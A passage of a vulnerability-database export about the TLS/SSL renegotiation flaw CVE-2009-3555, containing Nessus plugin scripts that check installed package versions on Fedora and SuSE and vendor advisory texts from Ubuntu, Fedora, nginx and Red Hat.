audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"tomcat-native-1.1.18-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat-native\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:44:20", "description": "IBM Java 1.4.2 was updated to version U13 FP 4 iFixes to fix the SSL\nrenegotiation flaw reported as CVE-2009-3555, as well as SAP installer\nrelated bugs.", "edition": 23, "published": "2012-05-17T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.4.2 (ZYPP Patch Number 7036)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2012-05-17T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_4_2-IBM-7036.NASL", "href": "https://www.tenable.com/plugins/nessus/59119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59119);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.4.2 (ZYPP Patch Number 7036)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 1.4.2 was updated to version U13 FP 4 iFixes to fix the SSL\nrenegotiation flaw reported as CVE-2009-3555, as well as SAP installer\nrelated bugs.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7036.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_4_2-ibm-1.4.2_sr13.4-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_4_2-ibm-devel-1.4.2_sr13.4-1.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:08:55", "description": "Add implementation of the safe renegotiation extension to fix the\nCVE-2009-3555 security vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2010-07-01T00:00:00", "title": "Fedora 13 : gnutls-2.8.6-2.fc13 (2010-9518)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-07-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gnutls", "cpe:/o:fedoraproject:fedora:13"], "id": "FEDORA_2010-9518.NASL", "href": "https://www.tenable.com/plugins/nessus/47539", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-9518.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47539);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_xref(name:\"FEDORA\", value:\"2010-9518\");\n\n script_name(english:\"Fedora 13 : gnutls-2.8.6-2.fc13 (2010-9518)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add implementation of the safe renegotiation extension to fix the\nCVE-2009-3555 security vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=533125\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-June/043275.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?752e4185\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"gnutls-2.8.6-2.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:43:25", "description": "The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache's mod_ssl was\nvulnerable to this kind of attack because it uses openssl. Please note\nthat renegotiation will be disabled by this update and may cause\nproblems in some cases. (CVE-2009-3555: CVSS v2 Base Score: 6.4)", "edition": 24, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 6657)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_COMPAT-OPENSSL097G-6657.NASL", "href": "https://www.tenable.com/plugins/nessus/49839", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49839);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 6657)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache's mod_ssl was\nvulnerable to this kind of attack because it uses openssl. Please note\nthat renegotiation will be disabled by this update and may cause\nproblems in some cases. (CVE-2009-3555: CVSS v2 Base Score: 6.4)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6657.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"compat-openssl097g-0.9.7g-13.19.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.19.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"compat-openssl097g-0.9.7g-13.19.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.19.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:07:16", "description": "This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgnutls-extra26", "p-cpe:/a:novell:opensuse:libgnutls26", "p-cpe:/a:novell:opensuse:libgnutls26-32bit", "p-cpe:/a:novell:opensuse:gnutls", "p-cpe:/a:novell:opensuse:libgnutls-devel", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:libgnutls-extra-devel"], "id": "SUSE_11_3_GNUTLS-101206.NASL", "href": "https://www.tenable.com/plugins/nessus/75522", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3647.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75522);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)\");\n script_summary(english:\"Check for the gnutls-3647 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00051.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"gnutls-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-devel-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-extra-devel-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-extra26-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls26-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.8.6-2.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T01:31:52", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "USN-927-1 fixed vulnerabilities in nss in Ubuntu 9.10. This update provides \nthe corresponding updates for Ubuntu 8.04 LTS.\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. This update adds support for the new \nnew renegotiation extension and will use it when the server supports it.", "edition": 5, "modified": "2010-06-29T00:00:00", "published": "2010-06-29T00:00:00", "id": "USN-927-4", "href": "https://ubuntu.com/security/notices/USN-927-4", "title": "nss vulnerability", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-09T00:29:17", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. This update adds backported support \nfor the new RFC5746 renegotiation extension and will use it when both the \nclient and the server support it.\n\nATTENTION: After applying this update, a patched server will allow both \npatched and unpatched clients to connect, but unpatched clients will not be \nable to renegotiate. For more information, please refer to the following: \n<http://www.openssl.org/docs/ssl/SSL_CTX_set_options.html#SECURE_RENEGOTIATION>", "edition": 5, "modified": "2010-09-21T00:00:00", "published": "2010-09-21T00:00:00", "id": "USN-990-1", "href": "https://ubuntu.com/security/notices/USN-990-1", "title": "OpenSSL vulnerability", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-09T00:21:09", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "USN-860-1 introduced a partial workaround to Apache that disabled client \ninitiated TLS renegotiation in order to mitigate CVE-2009-3555. USN-990-1 \nintroduced the new RFC5746 renegotiation extension in openssl, and \ncompletely resolves the issue.\n\nAfter updating openssl, an Apache server will allow both patched and \nunpatched web browsers to connect, but unpatched browsers will not be able \nto renegotiate. This update introduces the new SSLInsecureRenegotiation \ndirective for Apache that may be used to re-enable insecure renegotiations \nwith unpatched web browsers. For more information, please refer to: \n<http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslinsecurerenegotiation>\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. This update adds backported support \nfor the new RFC5746 renegotiation extension and will use it when both the \nclient and the server support it.", "edition": 5, "modified": "2010-09-21T00:00:00", "published": "2010-09-21T00:00:00", "id": "USN-990-2", "href": "https://ubuntu.com/security/notices/USN-990-2", "title": "Apache vulnerability", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-09T01:31:24", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "USN-927-4 fixed vulnerabilities in NSS. This update provides the NSPR \nneeded to use the new NSS.\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. This update adds support for the new \nnew renegotiation extension and will use it when the server supports it.", "edition": 15, "modified": "2010-06-29T00:00:00", "published": "2010-06-29T00:00:00", "id": "USN-927-5", "href": "https://ubuntu.com/security/notices/USN-927-5", "title": "nspr update", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Utilities for Network Security Services and the Softoken module ", "modified": "2009-12-10T04:13:15", "published": "2009-12-10T04:13:15", "id": "FEDORA:0C0C510F85F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: nss-util-3.12.5-1.fc12.1", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. Applications built with NSS can support SSL v2 and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards. ", "modified": "2010-03-11T13:25:20", "published": "2010-03-11T13:25:20", "id": "FEDORA:0FD0F10F8DA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: nss-3.12.6-1.2.fc13", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Tomcat can use the Apache Portable Runtime to provide superior scalability, performance, and better integration with native server technologies. The Apache Portable Runtime is a highly portable library that is at the heart of Apache HTTP Server 2.x. APR has many uses, including access to advanced IO functionality (such as sendfile, epoll and OpenSSL), OS level functionality (random number generation, system status, etc), and native process handling (shared memory, NT pipes and Unix sockets). This package contains the Tomcat native library which provides support for using APR in Tomcat. ", "modified": "2009-12-18T04:35:37", "published": "2009-12-18T04:35:37", "id": "FEDORA:1B80628EDC8", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: tomcat-native-1.1.18-1.fc12", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "GnuTLS is a project that aims to develop a library which provides a secure layer, over a reliable transport layer. Currently the GnuTLS library implem ents the proposed standards by the IETF's TLS working group. ", "modified": "2010-06-22T17:21:05", "published": "2010-06-22T17:21:05", "id": "FEDORA:6A214110D58", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: gnutls-2.8.6-2.fc13", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. Applications built with NSS can support SSL v2 and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards. ", "modified": "2010-03-23T02:03:18", "published": "2010-03-23T02:03:18", "id": "FEDORA:E3F6C10FD89", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: nss-3.12.6-1.2.fc11", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "GnuTLS is a project that aims to develop a library which provides a secure layer, over a reliable transport layer. Currently the GnuTLS library implem ents the proposed standards by the IETF's TLS working group. ", "modified": "2010-06-25T18:15:19", "published": "2010-06-25T18:15:19", "id": "FEDORA:DB226111816", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: gnutls-2.8.6-2.fc12", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Tomcat can use the Apache Portable Runtime to provide superior scalability, performance, and better integration with native server technologies. The Apache Portable Runtime is a highly portable library that is at the heart of Apache HTTP Server 2.x. APR has many uses, including access to advanced IO functionality (such as sendfile, epoll and OpenSSL), OS level functionality (random number generation, system status, etc), and native process handling (shared memory, NT pipes and Unix sockets). This package contains the Tomcat native library which provides support for using APR in Tomcat. ", "modified": "2009-12-18T04:33:34", "published": "2009-12-18T04:33:34", "id": "FEDORA:58E1828ED7E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: tomcat-native-1.1.18-1.fc11", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "nginx": [{"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "edition": 2, "description": "The renegotiation vulnerability in SSL protocol\nSeverity: major\nCVE-2009-3555\nNot vulnerable: 0.8.23+, 0.7.64+\nVulnerable: 0.1.0-0.8.22", "modified": "2009-11-09T17:30:00", "published": "2009-11-09T17:30:00", "id": "NGINX:CVE-2009-3555", "href": "http://nginx.org/en/security_advisories.html", "type": "nginx", "title": "The renegotiation vulnerability in SSL protocol", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:03", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "The IBM 1.4.2 SR13-FP4 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handle session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. (CVE-2009-3555)\n\nThis update disables renegotiation in the non-default IBM JSSE2 provider\nfor the Java Secure Socket Extension (JSSE) component. The default JSSE\nprovider is not updated with this fix. Refer to the IBMJSSE2 Provider\nReference Guide, linked to in the References, for instructions on how to\nconfigure the IBM Java 2 Runtime Environment to use the JSSE2 provider by\ndefault.\n\nWhen using the JSSE2 provider, unsafe renegotiation can be re-enabled using\nthe com.ibm.jsse2.renegotiate property. Refer to the following\nKnowledgebase article for details:\nhttp://kbase.redhat.com/faq/docs/DOC-20491\n\nThis update also fixes the following bug:\n\n* the libjaasauth.so file was missing from the java-1.4.2-ibm packages for\nthe Intel Itanium architecture (.ia64.rpm). This update adds the file to\nthe packages for the Itanium architecture, which resolves this 